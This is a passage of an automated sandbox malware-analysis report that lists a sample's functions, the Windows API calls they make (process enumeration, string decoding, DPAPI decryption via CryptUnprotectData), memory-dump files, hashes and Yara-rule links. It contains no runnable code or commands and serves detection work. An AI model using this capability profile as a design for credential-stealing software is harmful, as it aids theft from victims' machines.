                                • Part of subcall function 005B72B0: lstrcpy.KERNEL32(00000000), ref: 005B72DE
                              • CloseHandle.KERNEL32(00000000), ref: 005B3B97
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: a2b296ee40873d8e5fbb2c80e9417f62ace738af49ccb64d27f14dd61932bbc2
                              • Instruction ID: 2fb34dc53fdcb6952b5e096faf34348b2ffed7522bc24d39ba245b37aeb5bf47
                              • Opcode Fuzzy Hash: a2b296ee40873d8e5fbb2c80e9417f62ace738af49ccb64d27f14dd61932bbc2
                              • Instruction Fuzzy Hash: 5381E730904205CFC755CF19C888B95BBF1FB44329F29C1ADD408AB2A6D77AAD86CF40
                              Function 0059ED90 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0059EDD6
                              • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0059EDDE
                              • lstrcat.KERNEL32(005BD014,005BD014), ref: 0059EE87
                              • lstrcat.KERNEL32(005BD014,005BD014), ref: 0059EEA9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: d5dfbd8dacc699d611bbc17127151f2ca95c2a284049b38958fc388d55791a59
                              • Instruction ID: 3399306f60a56eb04c87a04a694b8f72dd193677631dfd0a028e5c092bfae163
                              • Opcode Fuzzy Hash: d5dfbd8dacc699d611bbc17127151f2ca95c2a284049b38958fc388d55791a59
                              • Instruction Fuzzy Hash: 1331FB75A0011A6BDB10DB54EC49FEE7B7CEF44704F048179FA08E6140EBB55A04CBB6
                              Function 005B4090 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 005B40AD
                              • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 005B40BC
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B40C3
                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 005B40F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptHeapString$AllocateProcess
                              • String ID:
                              • API String ID: 3825993179-0
                              • Opcode ID: 2a79689bc24066c2a4ddefb8a5e84d9b2ff8a819a2ad1b671556e7399aa3fb41
                              • Instruction ID: 5c45ffc5cfc7cd99ed528a1fef3706e3c7a61d10d913a4c16f6487f939a3f188
                              • Opcode Fuzzy Hash: 2a79689bc24066c2a4ddefb8a5e84d9b2ff8a819a2ad1b671556e7399aa3fb41
                              • Instruction Fuzzy Hash: 0D012C70600209BBDB20DFA5DC89FAABBADEF85311F108059FE09C7240EA75E940CB64
                              Function 005B2B00 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00000000,005BA400,000000FF), ref: 005B2B2F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B2B36
                              • GetLocalTime.KERNEL32(?), ref: 005B2B42
                              • wsprintfA.USER32 ref: 005B2B6E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 54363607b6f2c770dfce9fb599fbfd6117fb220b6cbfe08911765cce980f3503
                              • Instruction ID: 857e9013c6c197bdf361290eec4e2d27f68eaec31b2071e45e6a9756c943ac71
                              • Opcode Fuzzy Hash: 54363607b6f2c770dfce9fb599fbfd6117fb220b6cbfe08911765cce980f3503
                              • Instruction Fuzzy Hash: 160129B2904529ABCB549BC9DD49FBBB7BCFB4CB11F00421AF605A2280E67C5840C7B5
                              Function 00599B80 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00599B9B
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00599BAA
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00599BC1
                              • LocalFree.KERNEL32 ref: 00599BD0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: ae0a5192d4414a769163c85416b258a334f692c7085190dde7adfa40c1066c9e
                              • Instruction ID: a3172da3b0bd0ee7a6f9e0cd5dcc715f741dbda59167eb742bd2ae325339f5c1
                              • Opcode Fuzzy Hash: ae0a5192d4414a769163c85416b258a334f692c7085190dde7adfa40c1066c9e
                              • Instruction Fuzzy Hash: E9F012B03443126BEB701F24AC49F567BA8FB44B50F140418FA49EA2C0D7B99840C658
                              Function 00952632 Relevance: 5.3, Strings: 3, Instructions: 1558COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &}{7$cb~u$m.
                              • API String ID: 0-552598620
                              • Opcode ID: e58fda4191d195b12e78d8cefec2205d29b6fbd2de9f5b286d45edd2a0019325
                              • Instruction ID: 2e58e0e4d5f3c4272eeb499f59c26cb8e8663572982762fd84780fe474318ec5
                              • Opcode Fuzzy Hash: e58fda4191d195b12e78d8cefec2205d29b6fbd2de9f5b286d45edd2a0019325
                              • Instruction Fuzzy Hash: D0B226F3A0C2049FE7046E2DEC8577ABBE5EF94320F1A493DEAC487744EA3558058697
                              Function 005ACBE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(005BB140,00000000,00000001,005BB130,?), ref: 005ACC06
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 005ACC46
                              • lstrcpyn.KERNEL32(?,?,00000104), ref: 005ACCC9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                              • String ID:
                              • API String ID: 1940255200-0
                              • Opcode ID: ad08620386faa444d9cce5ca8e411706641ef3ce4f4d2fb3d61fd7b5142b0e7f
                              • Instruction ID: e67d08bfd2502498b3946a5b277e600b04104d0b87cc8ab63670adab35f10135
                              • Opcode Fuzzy Hash: ad08620386faa444d9cce5ca8e411706641ef3ce4f4d2fb3d61fd7b5142b0e7f
                              • Instruction Fuzzy Hash: E3314471A40615BFD710DB98CC95F9ABBB9AB89B10F104194FA14EB2D0D7B0AE45CBA0
                              Function 00599BE0 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00599BFF
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00599C13
                              • LocalFree.KERNEL32(?), ref: 00599C37
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 6a97f281717940aeac7b6455407fe7f18fb07fc8570c970c18f9bc1a30ac7336
                              • Instruction ID: 365de826dae54436e997cc7febc40a5886b977dfcb376732ae07413e3d99093e
                              • Opcode Fuzzy Hash: 6a97f281717940aeac7b6455407fe7f18fb07fc8570c970c18f9bc1a30ac7336
                              • Instruction Fuzzy Hash: EA0112B5A4130AABEB10DBA4DC55FBAB778EB44700F104558EE04AB380D7B49D0087E5
                              Function 00945731 Relevance: 3.6, Strings: 2, Instructions: 1063COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: O"}^$r!g
                              • API String ID: 0-1740976610
                              • Opcode ID: 55f730c1ab7f0a461f5e1b0865310eaeff498df693626744c0a6d6cc4a48e58d
                              • Instruction ID: b8a671b7aec3e81279fd340cdf2dce54b23c118cb9fca553eab816cffebf55be
                              • Opcode Fuzzy Hash: 55f730c1ab7f0a461f5e1b0865310eaeff498df693626744c0a6d6cc4a48e58d
                              • Instruction Fuzzy Hash: C8622BF3A0C2049FE3046E2DEC4567ABBEAEFD4320F1A8A3DE5C5C3744E97558058696
                              Function 005B3190 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: InfoSystemwsprintf
                              • String ID:
                              • API String ID: 2452939696-0
                              • Opcode ID: 12d2eed1e8978dd2ddf1143d45cc8c33dd1a54843f353b4a5a82f00de93aae9e
                              • Instruction ID: 47716ed5af2aa57553c892620decd402dd32f0796b79f506343d285902784dc9
                              • Opcode Fuzzy Hash: 12d2eed1e8978dd2ddf1143d45cc8c33dd1a54843f353b4a5a82f00de93aae9e
                              • Instruction Fuzzy Hash: ACF090B1940208AFCB10CF84EC85FDAFB7DFB48A20F40866EE90592280D7782944CAE5
                              Function 008930C7 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: =vgy
                              • API String ID: 0-1880940410
                              • Opcode ID: 01235e5a9275b817919772c71eeb8180e98a2e677f41effcd8e39843c0a77568
